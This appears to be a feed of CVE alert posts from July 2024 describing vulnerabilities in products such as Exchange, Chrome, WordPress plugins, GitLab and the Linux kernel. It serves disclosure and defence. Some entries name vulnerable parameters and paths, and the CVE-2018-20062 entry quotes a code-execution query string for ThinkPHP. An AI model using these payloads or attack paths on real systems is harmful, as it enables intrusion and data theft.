🚨 CVE-2024-28772IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 285645.🎖@cveNotify |
|
| 2024-07-25 18:37:25 |
🚨 CVE-2023-46943An issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.8. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.🎖@cveNotify |
|
| 2024-07-25 18:37:24 |
🚨 CVE-2023-46942Lack of authentication in NPM's package @evershop/evershop before version 1.0.0-rc.8, allows remote attackers to obtain sensitive information via improper authorization in GraphQL endpoints.🎖@cveNotify |
|
| 2024-07-25 18:07:32 |
🚨 CVE-2021-26858Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-25 18:07:26 |
🚨 CVE-2021-26857Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-25 18:07:25 |
🚨 CVE-2021-21148Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-25 18:07:24 |
🚨 CVE-2021-22502Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.🎖@cveNotify |
|
| 2024-07-25 17:37:33 |
🚨 CVE-2021-26411Internet Explorer Memory Corruption Vulnerability🎖@cveNotify |
|
| 2024-07-25 17:37:26 |
🚨 CVE-2021-21166Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-25 17:37:25 |
🚨 CVE-2020-15999Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-25 17:37:24 |
🚨 CVE-2020-3569Multiple vulnerabilities in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to either immediately crash the Internet Group Management Protocol (IGMP) process or make it consume available memory and eventually crash. The memory consumption may negatively impact other processes that are running on the device. These vulnerabilities are due to the incorrect handling of IGMP packets. An attacker could exploit these vulnerabilities by sending crafted IGMP traffic to an affected device. A successful exploit could allow the attacker to immediately crash the IGMP process or cause memory exhaustion, resulting in other processes becoming unstable. These processes may include, but are not limited to, interior and exterior routing protocols. Cisco will release software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2024-07-25 17:07:26 |
🚨 CVE-2024-40430In SFTPGO 2.6.2, the JWT implementation lacks cerrtain security measures, such as using JWT ID (JTI) claims, nonces, and proper expiration and invalidation mechanisms.🎖@cveNotify |
|
| 2024-07-25 17:07:25 |
🚨 CVE-2020-5902In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.🎖@cveNotify |
|
| 2024-07-25 17:07:24 |
🚨 CVE-2020-8515DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.🎖@cveNotify |
|
| 2024-07-25 16:37:31 |
🚨 CVE-2024-6535A flaw was found in Skupper. When Skupper is initialized with the console-enabled and with console-auth set to Openshift, it configures the openshift oauth-proxy with a static cookie-secret. In certain circumstances, this may allow an attacker to bypass authentication to the Skupper console via a specially-crafted cookie.🎖@cveNotify |
|
| 2024-07-25 16:37:30 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-07-25 16:37:26 |
🚨 CVE-2019-1429A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1426, CVE-2019-1427, CVE-2019-1428.🎖@cveNotify |
|
| 2024-07-25 16:37:25 |
🚨 CVE-2019-11510In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .🎖@cveNotify |
|
| 2024-07-25 16:37:24 |
🚨 CVE-2019-0808An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.🎖@cveNotify |
|
| 2024-07-25 16:07:42 |
🚨 CVE-2024-6962A vulnerability classified as critical was found in Tenda O3 1.0.0.10. This vulnerability affects the function formQosSet. The manipulation of the argument remark/ipRange/upSpeed/downSpeed/enable leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272116. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-25 16:07:41 |
🚨 CVE-2024-37449Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ThemePunch OHG Slider Revolution.This issue affects Slider Revolution: from n/a through 6.7.13.🎖@cveNotify |
|
| 2024-07-25 16:07:37 |
🚨 CVE-2024-37446Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kiboko Labs Chained Quiz allows Stored XSS.This issue affects Chained Quiz: from n/a through 1.3.2.8.🎖@cveNotify |
|
| 2024-07-25 16:07:36 |
🚨 CVE-2024-38781Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ArtistScope CopySafe Web Protection allows Reflected XSS.This issue affects CopySafe Web Protection: from n/a through 3.15.🎖@cveNotify |
|
| 2024-07-25 16:07:35 |
🚨 CVE-2024-37485Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Vinny Alves (UseStrict Consulting) bbPress Notify allows Reflected XSS.This issue affects bbPress Notify: from n/a through 2.18.3.🎖@cveNotify |
|
| 2024-07-25 16:07:32 |
🚨 CVE-2024-37480Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions apollo13-framework-extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.3.🎖@cveNotify |
|
| 2024-07-25 16:07:31 |
🚨 CVE-2024-37461Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Martin Gibson IdeaPush allows Stored XSS.This issue affects IdeaPush: from n/a through 8.65.🎖@cveNotify |
|
| 2024-07-25 16:07:30 |
🚨 CVE-2024-37460Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SuperSaaS SuperSaaS – online appointment scheduling allows Stored XSS.This issue affects SuperSaaS – online appointment scheduling: from n/a through 2.1.9.🎖@cveNotify |
|
| 2024-07-25 16:07:27 |
🚨 CVE-2024-37459Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PayPlus LTD PayPlus Payment Gateway allows Reflected XSS.This issue affects PayPlus Payment Gateway: from n/a through 6.6.8.🎖@cveNotify |
|
| 2024-07-25 16:07:26 |
🚨 CVE-2024-38785Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jegstudio Gutenverse allows Stored XSS.This issue affects Gutenverse: from n/a through 1.9.2.🎖@cveNotify |
|
| 2024-07-25 16:07:25 |
🚨 CVE-2023-1711A vulnerability exists in a FOXMAN-UN and UNEM logging component, it only affects systems that use remote authentication to the network elements. If exploited an attacker could obtain confidential information.List of CPEs: * cpe:2.3:a:hitachienergy:foxman_un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman_un:R16A:*:*:*:*:*:*:* * * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy: unem :R16A:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2024-07-25 15:07:26 |
🚨 CVE-2019-9978The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.🎖@cveNotify |
|
| 2024-07-25 15:07:25 |
🚨 CVE-2018-20062An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.🎖@cveNotify |
|
| 2024-07-25 15:07:24 |
🚨 CVE-2018-11776Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.🎖@cveNotify |
|
| 2024-07-25 14:37:38 |
🚨 CVE-2020-0069In the ioctl handlers of the Mediatek Command Queue driver, there is a possible out of bounds write due to insufficient input sanitization and missing SELinux restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-147882143References: M-ALPS04356754🎖@cveNotify |
|
| 2024-07-25 14:37:37 |
🚨 CVE-2019-18935Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)🎖@cveNotify |
|
| 2024-07-25 14:37:36 |
🚨 CVE-2019-5544OpenSLP as used in ESXi and the Horizon DaaS appliances has a heap overwrite issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.🎖@cveNotify |
|
| 2024-07-25 14:37:32 |
🚨 CVE-2018-13379An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.🎖@cveNotify |
|
| 2024-07-25 14:37:31 |
🚨 CVE-2018-15961Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-07-25 14:37:30 |
🚨 CVE-2016-4822Corega CG-WLBARGL devices allow remote authenticated users to execute arbitrary commands via unspecified vectors.🎖@cveNotify |
|
| 2024-07-25 14:07:27 |
🚨 CVE-2017-0143The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.🎖@cveNotify |
|
| 2024-07-25 14:07:26 |
🚨 CVE-2016-7255The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-25 14:07:25 |
🚨 CVE-2012-3152Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.🎖@cveNotify |
|
| 2024-07-25 13:37:31 |
🚨 CVE-2024-2473The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.🎖@cveNotify |
|
| 2024-07-25 13:37:30 |
🚨 CVE-2024-35752Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Enea Overclokk Stellissimo Text Box allows Stored XSS.This issue affects Stellissimo Text Box: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-07-25 13:37:26 |
🚨 CVE-2024-35740Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Pixgraphy allows Stored XSS.This issue affects Pixgraphy: from n/a through 1.3.8.🎖@cveNotify |
|
| 2024-07-25 13:37:25 |
🚨 CVE-2024-35738Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kognetiks Kognetiks Chatbot for WordPress allows Stored XSS.This issue affects Kognetiks Chatbot for WordPress: from n/a through 1.9.8.🎖@cveNotify |
|
| 2024-07-25 13:37:24 |
🚨 CVE-2024-35737Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Loopus WP Visitors Tracker allows Reflected XSS.This issue affects WP Visitors Tracker: from n/a through 2.3.🎖@cveNotify |
|
| 2024-07-25 13:07:30 |
🚨 CVE-2024-0972The BuddyPress Members Only plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.5 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "All Other Sections On Your Site Will be Opened to Guest" feature (when unset) and view restricted page and post content.🎖@cveNotify |
|
| 2024-07-25 13:07:26 |
🚨 CVE-2024-2350The Clever Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CAFE Icon, CAFE Team Member, and CAFE Slider widgets in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-25 13:07:25 |
🚨 CVE-2023-6968The The Moneytizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.5.20. This is due to missing or incorrect nonce validation on multiple AJAX functions. This makes it possible for unauthenticated attackers to to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-25 13:07:24 |
🚨 CVE-2024-5653A vulnerability, which was classified as critical, has been found in Chanjet Smooth T+system 3.5. This issue affects some unknown processing of the file /tplus/UFAQD/keyEdit.aspx. The manipulation of the argument KeyID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-25 12:37:45 |
🚨 CVE-2024-36537Insecure permissions in cert-manager v1.14.4 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.🎖@cveNotify |
|
| 2024-07-25 12:37:38 |
🚨 CVE-2024-41672DuckDB is a SQL database management system. In versions 1.0.0 and prior, content in filesystem is accessible for reading using `sniff_csv`, even with `enable_external_access=false`. This vulnerability provides an attacker with access to filesystem even when access is expected to be disabled and other similar functions do NOT provide access. There seem to be two vectors to this vulnerability. First, access to files that should otherwise not be allowed. Second, the content from a file can be read (e.g. `/etc/hosts`, `proc/self/environ`, etc) even though that doesn't seem to be the intent of the sniff_csv function. A fix for this issue is available in commit c9b7c98aa0e1cd7363fe8bb8543a95f38e980d8a and is expected to be part of version 1.1.0.🎖@cveNotify |
|
| 2024-07-25 12:37:37 |
🚨 CVE-2024-37533IBM InfoSphere Information Server 11.7 could disclose sensitive user information to another user with physical access to the machine. IBM X-Force ID: 294727.🎖@cveNotify |
|
| 2024-07-25 12:37:33 |
🚨 CVE-2024-41662VNote is a note-taking platform. A Cross-Site Scripting (XSS) vulnerability has been identified in the Markdown rendering functionality of versions 3.18.1 and prior of the VNote note-taking application. This vulnerability allows the injection and execution of arbitrary JavaScript code through which remote code execution can be achieved. A patch for this issue is available at commit f1af78573a0ef51d6ef6a0bc4080cddc8f30a545. Other mitigation strategies include implementing rigorous input sanitization for all Markdown content and utilizing a secure Markdown parser that appropriately escapes or strips potentially dangerous content.🎖@cveNotify |
|
| 2024-07-25 12:37:32 |
🚨 CVE-2024-36539Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.🎖@cveNotify |
|
| 2024-07-25 11:37:24 |
🚨 CVE-2024-6589The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.6.8.2 via the 'render_content_block_template' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-07-25 10:37:24 |
🚨 CVE-2024-37084In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server🎖@cveNotify |
|
| 2024-07-25 09:37:24 |
🚨 CVE-2024-41012In the Linux kernel, the following vulnerability has been resolved:filelock: Remove locks reliably when fcntl/close race is detectedWhen fcntl_setlk() races with close(), it removes the created lock withdo_lock_file_wait().However, LSMs can allow the first do_lock_file_wait() that created the lockwhile denying the second do_lock_file_wait() that tries to remove the lock.Separately, posix_lock_file() could also fail toremove a lock due to GFP_KERNEL allocation failure (when splitting a rangein the middle).After the bug has been triggered, use-after-free reads will occur inlock_get_status() when userspace reads /proc/locks. This can likely be usedto read arbitrary kernel memory, but can't corrupt kernel memory.Fix it by calling locks_remove_posix() instead, which is designed toreliably get rid of POSIX locks associated with the given file andfiles_struct and is also used by filp_flush().🎖@cveNotify |
|
| 2024-07-25 08:37:25 |
🚨 CVE-2024-41706A stored XSS issue was discovered in Archer Platform 6 before version 2024.06. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 P4 (6.14.0.4) is also a fixed release.🎖@cveNotify |
|
| 2024-07-25 08:37:24 |
🚨 CVE-2024-41705A stored XSS issue was discovered in Archer Platform 6.8 before 2024.06. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14.P4 (6.14.0.4) and 6.13 P4 (6.13.0.4) are also fixed releases. This vulnerability is similar to, but not identical to, CVE-2023-30639.🎖@cveNotify |
|
| 2024-07-25 06:37:24 |
🚨 CVE-2024-6972In affected versions of Octopus Server under certain circumstances it is possible for sensitive variables to be printed in the task log in clear-text.🎖@cveNotify |
|
| 2024-07-25 05:37:24 |
🚨 CVE-2024-4811In affected versions of Octopus Server under certain conditions, a user with specific role assignments can access restricted project artifacts.🎖@cveNotify |
|
| 2024-07-25 04:37:25 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-07-25 04:37:24 |
🚨 CVE-2024-35260An authenticated attacker can exploit an Untrusted Search Path vulnerability in Microsoft Dataverse to execute code over a network.🎖@cveNotify |
|
| 2024-07-25 01:37:25 |
🚨 CVE-2024-7057An information disclosure vulnerability in GitLab CE/EE affecting all versions starting from 16.7 prior to 17.0.5, starting from 17.1 prior to 17.1.3, and starting from 17.2 prior to 17.2.1 where job artifacts can be inappropriately exposed to users lacking the proper authorization level.🎖@cveNotify |
|
| 2024-07-25 01:37:24 |
🚨 CVE-2024-7047A cross site scripting vulnerability exists in GitLab CE/EE affecting all versions from 16.6 prior to 17.0.5, 17.1 prior to 17.1.3, 17.2 prior to 17.2.1 allowing an attacker to execute arbitrary scripts under the context of the current logged in user.🎖@cveNotify |
|
| 2024-07-24 23:37:25 |
🚨 CVE-2024-7060An information disclosure vulnerability in GitLab CE/EE in project/group exports affecting all versions from 15.4 prior to 17.0.5, 17.1 prior to 17.1.3, and 17.2 prior to 17.2.1 allows unauthorized users to view the resultant export.🎖@cveNotify |
|
| 2024-07-24 23:37:24 |
🚨 CVE-2024-0231A resource misdirection vulnerability in GitLab CE/EE versions 12.0 prior to 17.0.5, 17.1 prior to 17.1.3, and 17.2 prior to 17.2.1 allows an attacker to craft a repository import in such a way as to misdirect commits.🎖@cveNotify |
|
| 2024-07-24 21:37:32 |
🚨 CVE-2024-41459Tenda FH1201 v1.2.0.14 was discovered to contain a stack-based buffer overflow vulnerability via the PPPOEPassword parameter at ip/goform/QuickIndex.🎖@cveNotify |
|
| 2024-07-24 21:37:26 |
🚨 CVE-2024-41136An authenticated command injection vulnerability exists in the HPE Aruba Networking EdgeConnect SD-WAN gateways Command Line Interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-07-24 21:37:25 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-07-24 21:37:24 |
🚨 CVE-2020-7240Meinberg Lantime M300 and M1000 devices allow attackers (with privileges to configure a device) to execute arbitrary OS commands by editing the /config/netconf.cmd script (aka Extended Network Configuration). Note: According to the description, the vulnerability requires a fully authenticated super-user account using a webUI function that allows super users to edit a script supposed to execute OS commands. The given weakness enumeration (CWE-78) is not applicable in this case as it refers to abusing functions/input fields not supposed to be accepting OS commands by using 'Special Elements.🎖@cveNotify |
|
| 2024-07-24 20:37:32 |
🚨 CVE-2024-2430The Website Content in Page or Post WordPress plugin before 2024.04.09 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-24 20:37:26 |
🚨 CVE-2024-4458The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in several widgets via URL parameters in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 20:37:25 |
🚨 CVE-2024-2922The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget tags in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 20:37:24 |
🚨 CVE-2024-1175The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_payment' function in all versions up to, and including, 16.26.6. This makes it possible for unauthenticated attackers to delete arbitrary payments.🎖@cveNotify |
|
| 2024-07-24 20:07:25 |
🚨 CVE-2024-4753The WP Secure Maintenance WordPress plugin before 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-24 20:07:24 |
🚨 CVE-2024-2640The Watu Quiz WordPress plugin before 3.4.1.2 does not sanitise and escape some of its settings, which could allow users such as authors (if they've been authorized by admins) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2024-07-24 19:37:24 |
🚨 CVE-2024-39494In the Linux kernel, the following vulnerability has been resolved:ima: Fix use-after-free on a dentry's dname.name->d_name.name can change on rename and the earlier value can be freed;there are conditions sufficient to stabilize it (->d_lock on dentry,->d_lock on its parent, ->i_rwsem exclusive on the parent's inode,rename_lock), but none of those are met at any of the sites. Take a stablesnapshot of the name instead.🎖@cveNotify |
|
| 2024-07-24 19:07:26 |
🚨 CVE-2024-40903In the Linux kernel, the following vulnerability has been resolved:usb: typec: tcpm: fix use-after-free case in tcpm_register_source_capsThere could be a potential use-after-free case intcpm_register_source_caps(). This could happen when: * new (say invalid) source caps are advertised * the existing source caps are unregistered * tcpm_register_source_caps() returns with an error as usb_power_delivery_register_capabilities() failsThis causes port->partner_source_caps to hold on to the now freed sourcecaps.Reset port->partner_source_caps value to NULL after unregisteringexisting source caps.🎖@cveNotify |
|
| 2024-07-24 19:07:25 |
🚨 CVE-2024-39496In the Linux kernel, the following vulnerability has been resolved:btrfs: zoned: fix use-after-free due to race with dev replaceWhile loading a zone's info during creation of a block group, we can racewith a device replace operation and then trigger a use-after-free on thedevice that was just replaced (source device of the replace operation).This happens because at btrfs_load_zone_info() we extract a device fromthe chunk map into a local variable and then use the device while notunder the protection of the device replace rwsem. So if there's a devicereplace operation happening when we extract the device and that deviceis the source of the replace operation, we will trigger a use-after-freeif before we finish using the device the replace operation finishes andfrees the device.Fix this by enlarging the critical section under the protection of thedevice replace rwsem so that all uses of the device are done inside thecritical section.🎖@cveNotify |
|
| 2024-07-24 19:07:24 |
🚨 CVE-2024-39495In the Linux kernel, the following vulnerability has been resolved:greybus: Fix use-after-free bug in gb_interface_release due to race condition.In gb_interface_create, &intf->mode_switch_completion is bound withgb_interface_mode_switch_work. Then it will be started bygb_interface_request_mode_switch. Here is the relevant code.if (!queue_work(system_long_wq, &intf->mode_switch_work)) { ...}If we call gb_interface_release to make cleanup, there may be anunfinished work. This function will call kfree to free the object"intf". However, if gb_interface_mode_switch_work is scheduled torun after kfree, it may cause use-after-free error asgb_interface_mode_switch_work will use the object "intf".The possible execution flow that may lead to the issue is as follows:CPU0 CPU1 | gb_interface_create | gb_interface_request_mode_switchgb_interface_release |kfree(intf) (free) | | gb_interface_mode_switch_work | mutex_lock(&intf->mutex) (use)Fix it by canceling the work before kfree.🎖@cveNotify |
|
| 2024-07-24 18:07:37 |
🚨 CVE-2024-5162The WordPress prettyPhoto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 18:07:31 |
🚨 CVE-2024-5161The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ parameter in all versions up to, and including, 1.1.39 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 18:07:30 |
🚨 CVE-2024-5141The Rotating Tweets (Twitter widget and shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's' 'rotatingtweets' in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 18:07:29 |
